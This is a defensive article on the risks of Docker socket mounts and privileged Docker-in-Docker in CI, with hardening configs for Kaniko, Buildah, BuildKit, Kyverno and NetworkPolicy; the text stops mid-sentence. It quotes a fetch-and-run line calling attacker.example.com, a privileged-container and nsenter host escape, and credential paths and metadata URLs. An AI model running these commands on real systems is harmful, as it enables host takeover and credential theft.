Docker-in-Docker and the Shared Kernel Double Bind: Why --privileged in CI Is Host Root
The Problem
Building container images in CI requires a container build tool running inside the CI environment, which in almost every modern Kubernetes-based CI system is itself a container. This creates a structural problem: how does a process running inside a container build another container image? Three patterns emerged historically. The first two are security disasters, and understanding why they became popular explains why they remain widespread.
Pattern 1: Docker Socket Mount
The CI job container has /var/run/docker.sock mounted from the host. Any docker build, docker push, or docker run command inside the CI job connects directly to the host Docker daemon via the Unix domain socket. This is not Docker-in-Docker — there is no inner Docker daemon — but it is strictly worse from a security perspective because the docker CLI binary in the container is just a thin client: all operations execute in the context of the host daemon running as root.
What this concretely grants to the CI job:
- Arbitrary privileged container creation on the host. docker run --privileged -v /:/host alpine chroot /host runs as root with full host filesystem access. One command, executed from inside the CI container, gives you a root shell on the Kubernetes node.
- Full read access to all running containers’ environments. docker inspect against any container ID on the host returns the full environment variable set for that container, including secrets injected as environment variables by Kubernetes, CI orchestrators, or other build jobs.
- Host credential access. The Docker daemon runs with the node’s Docker Hub, ECR, GCR, or other registry credentials cached in /root/.docker/config.json. A CI job with socket access can read those credentials directly or use them implicitly via docker pull.
- Full Docker API access. Volumes, networks, secrets (Docker Swarm secrets), configs: everything the Docker daemon manages is accessible.
The RUN steps in a Dockerfile execute inside ephemeral containers created by the daemon. If a Dockerfile contains RUN curl https://attacker.example.com/payload.sh | sh, that command runs in a container managed by the host daemon. With socket mount, the attacker payload executes with the full capabilities of a container spawned by root — not inside a sandboxed nested container.
This pattern became popular because it is simple: mount the socket, use docker build as-is. CI systems like early Jenkins pipelines and Docker Compose-based CI environments standardised on it. GitLab’s documentation recommended it for years. It remains the default in many internal CI configurations because engineers set it up five years ago and it worked, and no one audited the security implications.
Pattern 2: Docker-in-Docker (--privileged)
A Docker daemon runs inside the CI container. To give this inner daemon the kernel capabilities it needs — mounting overlay filesystems, manipulating cgroup hierarchies, creating network namespaces — the outer container is started with --privileged.
--privileged does three distinct things, each of which individually destroys container isolation:
- Grants all Linux capabilities. A non-privileged container has a restricted capability set. --privileged adds CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, and all other capabilities in the full set. CAP_SYS_ADMIN alone is effectively root: it allows mounting arbitrary filesystems and manipulating namespaces. CAP_SYS_MODULE allows loading kernel modules.
- Disables seccomp filtering. The seccomp profile that restricts the system calls a container can invoke is removed entirely. Every system call in the kernel ABI is available to processes inside the container.
- Disables AppArmor and SELinux MAC enforcement. The Mandatory Access Control profiles that constrain what files and devices a container can access are not applied.
The result is a container that shares the host kernel and has no meaningful restrictions beyond what the kernel itself imposes on a root process. A container with --privileged is not “root with elevated permissions”: it is root on the host, viewed through namespaces that provide minimal additional protection. Docker does not place privileged containers in a separate user namespace by default, so UID 0 inside the container is UID 0 on the host.
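Two of the three effects are visible from inside the container in /proc/self/status: the CapEff line holds the effective capability mask and the Seccomp line holds the seccomp mode (0 means no filter). The following is a minimal sketch of reading them, not a complete detector. The function names and the sample status text are illustrative assumptions, the 41-bit mask assumes a kernel that defines capabilities 0 through 40, and AppArmor or SELinux state is not covered.

```python
# Assumed width of the capability set: 41 capabilities (bits 0..40),
# which matches the 0x1ffffffffff mask seen on recent kernels.
FULL_CAP_MASK = (1 << 41) - 1


def parse_status(text):
    """Parse the 'Key:\tvalue' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def isolation_report(status_text, full_mask=FULL_CAP_MASK):
    """Report whether the process holds every capability and runs unfiltered."""
    fields = parse_status(status_text)
    cap_eff = int(fields.get("CapEff", "0"), 16)
    seccomp_mode = int(fields.get("Seccomp", "0"))
    return {
        "all_capabilities": (cap_eff & full_mask) == full_mask,
        "seccomp_disabled": seccomp_mode == 0,
    }


# Hypothetical samples: a --privileged container and a default Docker container.
SAMPLE_PRIVILEGED = "Name:\tsh\nCapEff:\t000001ffffffffff\nSeccomp:\t0\n"
SAMPLE_DEFAULT = "Name:\tsh\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"

if __name__ == "__main__":
    print(isolation_report(SAMPLE_PRIVILEGED))
    print(isolation_report(SAMPLE_DEFAULT))
```

In a real container, pass the contents of /proc/self/status instead of the sample strings.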
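The security distinction between --privileged DinD and the socket mount pattern is narrow in practice: the socket mount is a direct path to the host daemon; --privileged DinD provides a slightly indirect path via kernel CVE exploitation or direct use of the granted capabilities. If the container also shares the host PID namespace (--pid=host, or hostPID: true in a pod spec), nsenter --target 1 --mount --uts --ipc --net --pid -- bash joins the namespaces of PID 1 (host init) from inside the container. Without host PID sharing, PID 1 is the container’s own init, but a privileged container can still see the host’s block devices under /dev and mount the host root filesystem directly. Either way, this is a documented, trivial escape requiring zero kernel vulnerabilities.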
The DinD pattern was popularised by Jérôme Petazzoni’s 2013 work on running Docker inside Docker. In a later follow-up post, “Using Docker-in-Docker for your CI or testing environment? Think twice.”, the same author explicitly recommended against it for CI use. GitLab’s own documentation for their Docker executor still recommends privileged = true in the runner configuration as the supported approach for building Docker images. This is documented host compromise as an official configuration.
Pattern 3: The Correct Approach
Three production tools build OCI-compliant container images without requiring a Docker daemon, without --privileged, and without mounting the host socket. All three operate in userspace and use only unprivileged kernel facilities.
Kaniko (Google, 2018): Reads a Dockerfile and builds layers directly in userspace by unpacking base image layers to a directory, executing RUN commands with chroot into that directory, and snapshotting filesystem changes between steps using file modification timestamps and hash comparisons. The built image is pushed directly to a registry. Kaniko does not start a Docker daemon. The executor container does run as root inside the container (it needs to chroot and manipulate filesystem ownership), but it does not require --privileged and does not require kernel mount operations. The container can drop all Linux capabilities except those strictly needed for chroot operations.
Buildah (Red Hat, 2017): Builds OCI images without a daemon, supports rootless mode using kernel user namespace remapping (newuidmap/newgidmap). In rootless mode, the build process runs as a non-root user on the host and uses user namespace remapping to simulate root inside the build environment. Buildah supports a --isolation chroot mode that replaces kernel namespace creation with plain chroot, enabling builds in environments that do not permit user namespace creation. Buildah also supports OCI and Docker image formats, multiple transport protocols, and scripted builds via shell scripts rather than Dockerfiles.
BuildKit in rootless mode (Moby, docker/buildx): BuildKit is the build backend for docker buildx and can run as a standalone daemon (buildkitd) in rootless mode. Rootless BuildKit runs the build daemon as a non-root user using user namespaces, with no privileged operations required. The --oci-worker-no-process-sandbox flag disables the per-step process sandbox so that buildkitd can run inside an unprivileged container: lower isolation between build steps and the daemon, but broader compatibility. On GitHub Actions, docker/build-push-action drives BuildKit through buildx; whether that builder is actually rootless depends on the driver and BuildKit image configured, so verify it rather than assume it.
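The userspace snapshotting idea described for Kaniko above can be illustrated with a small sketch: record a content hash per file before a build step, record it again afterwards, and treat the difference as the new layer. This is an illustration of the general technique only, not Kaniko's implementation. It compares hashes alone (no timestamps), ignores symlinks, ownership, and permissions, and every name in it is hypothetical.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map each regular file's path (relative to root) to a SHA-256 digest."""
    state = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                state[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return state


def diff_snapshots(before, after):
    """Return the files a build step added, modified, or deleted."""
    return {
        "added": sorted(p for p in after if p not in before),
        "modified": sorted(p for p in after if p in before and after[p] != before[p]),
        "deleted": sorted(p for p in before if p not in after),
    }


def write(root, name, content):
    with open(os.path.join(root, name), "w") as fh:
        fh.write(content)


def demo():
    """Simulate one RUN step against a throwaway directory tree."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "base.txt", "from base image\n")
        write(root, "old.txt", "to be removed\n")
        before = snapshot(root)

        # The simulated RUN step: add one file, change one, delete one.
        write(root, "app.txt", "built artifact\n")
        write(root, "base.txt", "patched by RUN step\n")
        os.remove(os.path.join(root, "old.txt"))

        return diff_snapshots(before, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

Only the files listed under added and modified would need to go into the new layer, with the deleted entries recorded as removals.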
Threat Model
Docker socket mount — full host daemon access from any RUN step. The attack surface is every line of a Dockerfile, every build dependency pulled during the build, and every environment variable injected into the build environment. A poisoned base image (FROM malicious-base:latest) that has replaced a binary with a backdoored version will execute during the build with access to the host Docker socket. A compromised npm package pulled during RUN npm install executes its install scripts with socket access. A supply chain compromise upstream of the build — a poisoned layer in any transitive base image — executes with full host daemon access. The attacker does not need to compromise the CI infrastructure; they need to compromise one artifact in the build’s dependency graph.
--privileged DinD — kernel CVE exploitation reaches the Kubernetes node directly. CVE-2022-0847 (Dirty Pipe) demonstrated the class of vulnerability relevant here: a kernel vulnerability exploitable from inside a container that grants overwrite access to arbitrary read-only files, including the host’s /etc/passwd, /proc/sched_debug, and SUID binaries. Dirty Pipe was exploitable from inside --privileged containers — the container shares the kernel, so kernel vulnerabilities have the same exploitability profile as from the host. An attacker running arbitrary code inside the inner Docker environment (via a compromised build step) can exploit kernel vulnerabilities to reach the outer host without needing a container escape first, because --privileged has already removed the barriers.
The namespace escape requires no kernel vulnerability. Any process inside a --privileged container can reach the host’s filesystem and processes in approximately two commands: through nsenter when the host PID namespace is shared, or by mounting the host’s block device otherwise. This is not exploitation. It is intended kernel functionality working correctly.
Node compromise in a shared build cluster — the blast radius is every secret on the node. In a Kubernetes cluster where multiple teams’ build jobs run on shared nodes, one compromised build job that achieves host access on its node can access:
- All other pods’ environment variables. crictl inspect <container-id> on the node returns environment variables for every running container, including those of pods in different namespaces. In a busy build cluster, this includes other teams’ GITHUB_TOKENs, AWS credentials, Docker Hub passwords, and deployment keys currently in use.
- Kubelet credentials. The kubelet’s client certificate and key are stored on the node at /var/lib/kubelet/pki/. These credentials authenticate to the Kubernetes API server with the node’s identity. Depending on RBAC configuration, the node identity may permit reading secrets across namespaces.
- Cloud IMDS credentials. Cloud providers’ Instance Metadata Service endpoints (169.254.169.254 for AWS, Azure; metadata.google.internal for GCP) are accessible from the node and return credentials scoped to the node’s IAM role. The node IAM role in many Kubernetes deployments has broad permissions to support node operations. In AWS, this typically includes ecr:GetAuthorizationToken and may include s3:*, secretsmanager:GetSecretValue, or broader IAM permissions depending on how the cluster was configured.
- Registry credentials cached on the node. Docker and containerd cache registry authentication tokens. On a node that has pulled images from ECR, the cached token from /root/.docker/config.json or containerd’s credential cache grants docker pull access to every image in the account until the token expires.
GitLab CI Docker executor with privileged = true. GitLab’s official documentation for building Docker images in CI pipelines using the Docker executor reads: “Make the Docker executor privileged.” The config.toml snippet provided in the documentation contains privileged = true. This configuration applies to all jobs on that runner, not just image-building jobs. Any job that runs on a privileged runner — including jobs that do nothing more than run unit tests — runs in a --privileged container with full host access. GitLab groups can contain hundreds of repositories, and runners are frequently shared. A malicious actor who can push a branch to any repository in the group can trigger a CI job on the privileged runner, escape to the host, and access secrets from all other concurrent jobs.
Supply chain via poisoned base image with socket access. A build pipeline that uses FROM python:3.12-slim and mounts the Docker socket is trusting the security of the python image on Docker Hub, the security of Docker Hub’s image signing infrastructure, and the security of every layer in the image’s history. The python:3.12-slim image has hundreds of transitive dependencies. A compromise of any layer that executes code during the build (e.g., via a package manager in the base image that runs scripts) gives socket access. The Codecov breach (2021) demonstrated that even widely-trusted CI tooling with millions of installations can be compromised to exfiltrate credentials. A similarly-scoped compromise of a base image used in a socket-mounted build environment gives full host access rather than credential exfiltration.
Hardening Configuration
1. Kaniko in Kubernetes — No Privileged Required
Kaniko runs as a Kubernetes Pod with no special privileges. Registry credentials are passed via a Kubernetes Secret mounted as a volume.
apiVersion: v1
kind: Secret
metadata:
  name: registry-credentials
  namespace: ci-builds
type: kubernetes.io/dockerconfigjson
data:
  .dockerconfigjson: <base64-encoded-docker-config-json>
---
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
  namespace: ci-builds
spec:
  initContainers:
    - name: git-clone
      image: alpine/git:latest
      command:
        - git
        - clone
        - https://github.com/myorg/myrepo
        - /workspace
      volumeMounts:
        - name: workspace
          mountPath: /workspace
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
  containers:
    - name: kaniko
      image: gcr.io/kaniko-project/executor:v1.23.0
      args:
        - "--dockerfile=/workspace/Dockerfile"
        - "--context=dir:///workspace"
        - "--destination=myregistry.io/myimage:latest"
        - "--cache=true"
        - "--cache-repo=myregistry.io/myimage/cache"
        - "--cleanup"
      volumeMounts:
        - name: workspace
          mountPath: /workspace
        - name: registry-credentials
          mountPath: /kaniko/.docker
      securityContext:
        # Kaniko requires root inside the container for chroot operations,
        # but does NOT require --privileged
        runAsNonRoot: false
        runAsUser: 0
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
          # CHOWN and FSETID let Kaniko set file ownership and setuid/setgid
          # bits in built image layers; DAC_OVERRIDE lets it write files
          # regardless of their permission bits
          add: ["CHOWN", "FSETID", "DAC_OVERRIDE"]
        seccompProfile:
          type: RuntimeDefault
  volumes:
    - name: workspace
      emptyDir: {}
    - name: registry-credentials
      secret:
        secretName: registry-credentials
        items:
          - key: .dockerconfigjson
            path: config.json
  restartPolicy: Never
  serviceAccountName: kaniko-builder
  automountServiceAccountToken: false
Key points: allowPrivilegeEscalation: false prevents the executor from gaining additional privileges beyond what it starts with. seccompProfile: RuntimeDefault applies the container runtime’s default seccomp profile, restricting available system calls to a vetted list. No hostPath volumes. No socket mount. automountServiceAccountToken: false prevents the build pod from authenticating to the Kubernetes API — the build job does not need cluster access.
For temporary credentials (AWS ECR, GCR with Workload Identity), use a credential helper as an init container that writes a short-lived config.json to a shared emptyDir volume:
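initContainers:
  - name: ecr-credentials
    image: amazon/aws-cli:latest
    command:
      - sh
      - -c
      - |
        # Docker's config.json expects auth = base64("username:password").
        # For ECR the username is the literal string AWS.
        TOKEN="$(aws ecr get-login-password --region us-east-1)"
        AUTH="$(printf 'AWS:%s' "$TOKEN" | base64 | tr -d '\n')"
        printf '{"auths":{"123456789.dkr.ecr.us-east-1.amazonaws.com":{"auth":"%s"}}}\n' "$AUTH" \
          > /kaniko/.docker/config.json
    volumeMounts:
      - name: docker-config
        mountPath: /kaniko/.docker
    securityContext:
      runAsNonRoot: true
      # The image runs as root by default, so a non-root UID must be set
      # explicitly or the container is refused at start-up.
      runAsUser: 1000
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]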
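The config.json format used here is easy to get wrong: the auth field is the base64 encoding of username:password, not of the password alone, and for ECR the username is the fixed string AWS. A minimal sketch of building that document follows. The function name and the placeholder token are assumptions for illustration; in practice the token comes from aws ecr get-login-password.

```python
import base64
import json


def ecr_docker_config(registry_host, password, username="AWS"):
    """Build the JSON text of a Docker config.json for one registry.

    The "auth" value is base64("username:password"), which is the
    encoding Docker-compatible clients expect in this file.
    """
    credentials = f"{username}:{password}".encode("utf-8")
    auth = base64.b64encode(credentials).decode("ascii")
    return json.dumps({"auths": {registry_host: {"auth": auth}}})


if __name__ == "__main__":
    # Placeholder registry and token, for illustration only.
    print(ecr_docker_config("123456789.dkr.ecr.us-east-1.amazonaws.com", "example-token"))
```

Writing the returned string to /kaniko/.docker/config.json on the shared volume gives the executor short-lived credentials without a long-lived Secret.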
2. Buildah Rootless in GitLab CI
Buildah supports a chroot isolation mode that avoids kernel namespace creation entirely. Combined with the vfs storage driver, this produces builds that work inside standard unprivileged containers.
# .gitlab-ci.yml
build:
  image: quay.io/buildah/stable:v1.35.0
  variables:
    # chroot isolation: use chroot(2) instead of creating kernel namespaces.
    # Works in unprivileged containers. Slightly less isolation than
    # namespace-based isolation but requires no special kernel permissions.
    BUILDAH_ISOLATION: chroot
    # vfs storage driver: plain directory tree with full copies between layers.
    # No overlay mount operations, no kernel mount capabilities required.
    # Significantly slower than overlay but works without privileges.
    STORAGE_DRIVER: vfs
    # Write image manifests in OCI format
    BUILDAH_FORMAT: oci
  script:
    - buildah bud --isolation chroot --storage-driver vfs -t myimage:latest .
    # Block scalars keep the backslash line continuations intact for the shell
    - |
      buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
        myimage:latest \
        docker://myregistry.io/myimage:$CI_COMMIT_SHORT_SHA
    - |
      buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
        myimage:latest \
        docker://myregistry.io/myimage:latest
The BUILDAH_ISOLATION=chroot variable tells Buildah to use chroot(2) for build step isolation rather than creating new user, mount, and network namespaces. This is less isolation than full namespace separation: processes inside RUN steps can see the PID namespace and network interfaces of the CI job container that runs Buildah. They remain confined by that unprivileged container, however, and the mode requires no elevated kernel permissions.
STORAGE_DRIVER=vfs tells Buildah to use plain directory copies between layers rather than overlay filesystem mounts. This means each layer is a full copy of the previous layer’s directory tree rather than a copy-on-write overlay. For large images (e.g., images with a 1 GB base layer), this increases build time and disk usage substantially. For small images, the difference is acceptable.
For environments where user namespaces are available (kernels with CONFIG_USER_NS=y and, on distributions that carry the kernel.unprivileged_userns_clone sysctl, that sysctl set to 1), Buildah rootless with overlay provides better performance and the stronger isolation of namespace separation:
# /etc/containers/storage.conf inside the Buildah container image
# (configure via a custom image or mounted configmap)
[storage]
driver = "overlay"
[storage.options.overlay]
mount_program = "/usr/bin/fuse-overlayfs"
fuse-overlayfs implements overlay filesystem semantics in userspace via FUSE, avoiding the kernel-level mount(2) operations that require privileges.
3. BuildKit Rootless in GitHub Actions and Self-Hosted Runners
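On GitHub-hosted ubuntu-* runners, docker/setup-buildx-action creates a BuildKit builder container using docker buildx create, and docker/build-push-action sends builds to it. Each GitHub-hosted job runs on its own ephemeral virtual machine, so the builder is not sharing a host with other teams’ jobs. Whether the buildkitd container itself runs rootless depends on the driver options and image used, so treat rootless operation as something to verify rather than a default.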
# .github/workflows/build.yml
name: Build and Push Image
on:
  push:
    branches: [main]
permissions:
  contents: read
  id-token: write # Required for OIDC registry authentication
jobs:
  build:
    runs-on: ubuntu-24.04
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
        # actions/checkout v4.2.2 pinned by SHA
      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
        with:
          role-to-assume: arn:aws:iam::123456789:role/ci-image-push
          aws-region: us-east-1
      - name: Login to Amazon ECR
        id: ecr-login
        uses: aws-actions/amazon-ecr-login@062b18b96a7aff071d4dc91bc00c4c1a7945b076
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2
        with:
          # The docker-container driver runs buildkitd in a dedicated container.
          # This setting alone does not make the builder rootless; rootless
          # BuildKit images are published with a -rootless tag suffix.
          driver: docker-container
          driver-opts: |
            image=moby/buildkit:v0.18.2
            network=host
      - name: Build and push
        uses: docker/build-push-action@14487ce63c7a62a4a324b0bfb37086795e31c6c1
        with:
          context: .
          push: true
          tags: |
            ${{ steps.ecr-login.outputs.registry }}/myimage:${{ github.sha }}
            ${{ steps.ecr-login.outputs.registry }}/myimage:latest
          cache-from: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache
          cache-to: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache,mode=max
          provenance: true
          sbom: true
For self-hosted runners, where the builder lives on a long-lived shared host, create the BuildKit builder manually and verify how its container actually runs:
# On the self-hosted runner host, as a non-root user
docker buildx create \
  --name rootless-builder \
  --driver docker-container \
  --driver-opt image=moby/buildkit:v0.18.2,network=host \
  --use
# Start the builder so that its container exists before inspecting it
docker buildx inspect --bootstrap rootless-builder
# Check whether the builder container runs with --privileged
docker inspect buildx_buildkit_rootless-builder0 \
  --format '{{ .HostConfig.Privileged }}'
# Required output: false. If this prints true, the builder container is
# privileged and must not be treated as a rootless builder.
# Check for capability additions
docker inspect buildx_buildkit_rootless-builder0 \
  --format '{{ .HostConfig.CapAdd }}'
# Required output: []
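The same verification can be scripted against the JSON that docker inspect prints by default, which is convenient when a fleet of runners has to be checked. This is a minimal sketch: the function name and the sample document are illustrative assumptions, and only three HostConfig fields (Privileged, CapAdd, Binds) are examined.

```python
import json


def builder_findings(inspect_json):
    """Return human-readable findings for each container in `docker inspect` output."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "<unnamed>")
        host_config = container.get("HostConfig") or {}

        if host_config.get("Privileged"):
            findings.append(f"{name}: runs with --privileged")

        # CapAdd and Binds are null in the JSON when nothing was configured.
        cap_add = host_config.get("CapAdd") or []
        if cap_add:
            findings.append(f"{name}: adds capabilities {sorted(cap_add)}")

        for bind in host_config.get("Binds") or []:
            source = bind.split(":")[0]
            if source.endswith("docker.sock"):
                findings.append(f"{name}: bind-mounts {source}")
    return findings


# Hypothetical inspect output for two builder containers.
SAMPLE = json.dumps([
    {"Name": "/buildx_buildkit_a0",
     "HostConfig": {"Privileged": True, "CapAdd": None, "Binds": None}},
    {"Name": "/buildx_buildkit_b0",
     "HostConfig": {"Privileged": False, "CapAdd": None,
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
])

if __name__ == "__main__":
    for finding in builder_findings(SAMPLE):
        print(finding)
```

An empty result means none of the three checks fired; it does not prove the builder is rootless.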
For environments where BuildKit itself must run inside an unprivileged container, where it cannot create a fresh PID namespace or mount a new /proc for each build step, the --oci-worker-no-process-sandbox flag runs build steps without the process sandbox instead of with full namespace isolation. Rootless BuildKit still relies on user namespaces when this flag is set. With buildx, daemon flags are passed through --buildkitd-flags:
docker buildx create \
  --name compatible-builder \
  --driver docker-container \
  --driver-opt image=moby/buildkit:v0.18.2 \
  --buildkitd-flags '--oci-worker-no-process-sandbox' \
  --use
This reduces isolation: build steps share the PID and network namespaces of the BuildKit daemon rather than running in isolated namespaces. It is still substantially more secure than --privileged DinD because the daemon itself runs without elevated host privileges.
4. OPA/Kyverno Policy: Block Docker Socket Mounts and --privileged at Admission
Admission control prevents the configuration from ever reaching production. Deploy as a Kyverno ClusterPolicy in Enforce mode so that pods violating the policy are rejected at the API server rather than audited after the fact.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-privileged-builds
  annotations:
    policies.kyverno.io/title: Block Privileged Containers and Docker Socket Mounts
    policies.kyverno.io/description: >
      Privileged containers and Docker socket mounts grant full host access.
      Image builds must use Kaniko, Buildah, or rootless BuildKit.
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: block-privileged
      match:
        any:
          - resources:
              kinds: [Pod]
      validate:
        message: >
          Privileged containers are not permitted. Use Kaniko, Buildah with
          BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
          See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
        pattern:
          spec:
            =(initContainers):
              - =(securityContext):
                  =(privileged): "false"
            containers:
              - =(securityContext):
                  =(privileged): "false"
            =(ephemeralContainers):
              - =(securityContext):
                  =(privileged): "false"
    - name: block-docker-socket-hostpath
      match:
        any:
          - resources:
              kinds: [Pod]
      validate:
        message: >
          Mounting /var/run/docker.sock grants full host Docker daemon access.
          Remove the hostPath volume mount and use Kaniko or Buildah for image builds.
        deny:
          conditions:
            any:
              - key: "/var/run/docker.sock"
                operator: AnyIn
                value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
              - key: "/run/docker.sock"
                operator: AnyIn
                value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
    - name: block-containerd-socket-hostpath
      match:
        any:
          - resources:
              kinds: [Pod]
      validate:
        message: >
          Mounting the container runtime socket (/run/containerd/containerd.sock)
          grants host container runtime access equivalent to Docker socket access.
        deny:
          conditions:
            any:
              - key: "/run/containerd/containerd.sock"
                operator: AnyIn
                value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
    - name: require-drop-all-capabilities
      match:
        any:
          - resources:
              kinds: [Pod]
              namespaces: [ci-builds]
      validate:
        message: >
          All containers in the ci-builds namespace must drop ALL capabilities.
          If a specific capability is required, add it explicitly with justification.
        pattern:
          spec:
            containers:
              - securityContext:
                  capabilities:
                    drop: ["ALL"]
The policy also blocks /run/containerd/containerd.sock mounts. Mounting the containerd socket is equivalent to mounting the Docker socket — it provides direct access to the container runtime’s gRPC API, which can be used to create privileged containers, read container filesystem contents, and inject processes into running containers.
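The checks this policy performs can also be run offline against manifests, for example as a pre-merge lint before anything reaches the API server. The sketch below mirrors the privileged-container and socket-mount rules on a pod manifest already loaded into a Python dict. It is an approximation for illustration, not a reimplementation of Kyverno: the function name is hypothetical and the path list is limited to the three sockets named in the policy.

```python
SOCKET_PATHS = {
    "/var/run/docker.sock",
    "/run/docker.sock",
    "/run/containerd/containerd.sock",
}

CONTAINER_FIELDS = ("initContainers", "containers", "ephemeralContainers")


def audit_pod(pod):
    """Return a list of violations found in a pod manifest (as a dict)."""
    spec = pod.get("spec") or {}
    findings = []

    # Rule 1: no container of any kind may set privileged: true.
    for field in CONTAINER_FIELDS:
        for container in spec.get(field) or []:
            security_context = container.get("securityContext") or {}
            if security_context.get("privileged") is True:
                findings.append(f"{field}/{container.get('name')}: privileged")

    # Rule 2: no hostPath volume may point at a container runtime socket.
    for volume in spec.get("volumes") or []:
        path = (volume.get("hostPath") or {}).get("path")
        if path in SOCKET_PATHS:
            findings.append(f"volumes/{volume.get('name')}: hostPath {path}")

    return findings


# Hypothetical manifests: a DinD-style pod and a hardened build pod.
DIND_POD = {
    "spec": {
        "containers": [{"name": "dind", "securityContext": {"privileged": True}}],
        "volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}}],
    }
}
HARDENED_POD = {
    "spec": {
        "containers": [{"name": "kaniko", "securityContext": {"privileged": False}}],
        "volumes": [{"name": "workspace", "emptyDir": {}}],
    }
}

if __name__ == "__main__":
    print(audit_pod(DIND_POD))
    print(audit_pod(HARDENED_POD))
```

A lint like this complements admission control; it does not replace it, because it only sees manifests that pass through the pipeline where it runs.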
Apply the policy and immediately test it:
# Apply the policy
kubectl apply -f block-privileged-builds.yaml
# Test: attempt to create a privileged pod — should be rejected
kubectl run test-privileged \
--image=alpine \
--overrides='{"spec":{"containers":[{"name":"test","image":"alpine","securityContext":{"privileged":true}}]}}' \
--namespace=ci-builds
# Expected output:
# Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
# resource Pod/ci-builds/test-privileged was blocked due to the following policies
# block-privileged-builds/block-privileged:
# Privileged containers are not permitted. Use Kaniko, Buildah with
# BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
5. Dedicated Build Namespace with Network Policy for Legacy Migrations
When a migration from --privileged builds cannot be completed immediately, contain the blast radius. Isolate build workloads on dedicated nodes with taints and apply network egress restrictions that prevent the build node from reaching internal services.
# Taint dedicated build nodes so only build pods schedule there
kubectl taint nodes build-node-1 build-node-2 \
role=privileged-builds:NoSchedule
# Label the nodes
kubectl label nodes build-node-1 build-node-2 \
node-role=privileged-builds
# Toleration required on build pods to schedule on tainted nodes
spec:
  tolerations:
    - key: "role"
      operator: "Equal"
      value: "privileged-builds"
      effect: "NoSchedule"
  nodeSelector:
    node-role: privileged-builds
---
# NetworkPolicy: deny egress from ci-builds-legacy namespace to internal services
# Builds should only need to reach: git hosts, package registries, container registries
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: build-egress-restrictions
  namespace: ci-builds-legacy
spec:
  podSelector: {}
  policyTypes: [Egress]
  egress:
    # Allow DNS
    - ports:
        - port: 53
          protocol: UDP
        - port: 53
          protocol: TCP
    # Allow HTTPS to external hosts (package registries, git hosts, container registries).
    # A ports-only rule would allow port 443 to every destination, including the
    # in-cluster API server, so the destination is restricted with an ipBlock.
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              # Cloud IMDS
              - 169.254.169.254/32
              # Private ranges, assumed here to cover the cluster, service,
              # and internal network CIDRs; adjust to your environment
              - 10.0.0.0/8
              - 172.16.0.0/12
              - 192.168.0.0/16
      ports:
        - port: 443
          protocol: TCP
The IMDS block is important. If a --privileged build escapes to the node, the first thing an attacker’s tooling will do is query http://169.254.169.254/latest/meta-data/iam/security-credentials/ to obtain temporary cloud credentials. While a NetworkPolicy does not constrain root processes that have escaped the container namespace, it does constrain network traffic from build pods that have not yet escaped — preventing a less sophisticated attack from reaching the IMDS without full container escape.
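To reason about which destinations an egress rule actually admits, it helps to evaluate the ipBlock logic directly: a destination matches when it falls inside cidr and outside every except entry. The sketch below does that with the standard ipaddress module. It assumes a hypothetical rule that allows 0.0.0.0/0 except the IMDS address and the RFC 1918 private ranges; the function name and sample addresses are illustrative.

```python
import ipaddress

# Assumed rule for illustration: everything except IMDS and private ranges.
ALLOW_CIDR = "0.0.0.0/0"
EXCEPT_CIDRS = [
    "169.254.169.254/32",  # cloud instance metadata service
    "10.0.0.0/8",
    "172.16.0.0/12",
    "192.168.0.0/16",
]


def egress_allowed(destination, cidr=ALLOW_CIDR, except_cidrs=EXCEPT_CIDRS):
    """Evaluate a NetworkPolicy-style ipBlock (cidr plus except list)."""
    address = ipaddress.ip_address(destination)
    if address not in ipaddress.ip_network(cidr):
        return False
    return not any(address in ipaddress.ip_network(block) for block in except_cidrs)


if __name__ == "__main__":
    for destination in ("169.254.169.254", "10.96.0.1", "140.82.112.3"):
        print(destination, egress_allowed(destination))
```

This models only the address match. Port and protocol restrictions apply on top of it, and none of it applies to traffic from a process that has already escaped to the node's network namespace.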
For the kubelet credential threat, there is no NetworkPolicy mitigation once a container has --privileged and has escaped to the node. The only mitigations are: use node-level RBAC to minimise what the kubelet identity can access, enable Kubernetes audit logging to detect anomalous API calls from node identities, and migrate off --privileged as a priority.
Expected Behaviour
Kaniko Build — No Privileged Capabilities
After creating the Kaniko build pod, inspect the container’s capability set:
# From inside the Kaniko container, before the build starts.
# The standard executor image ships no shell or coreutils, so this needs
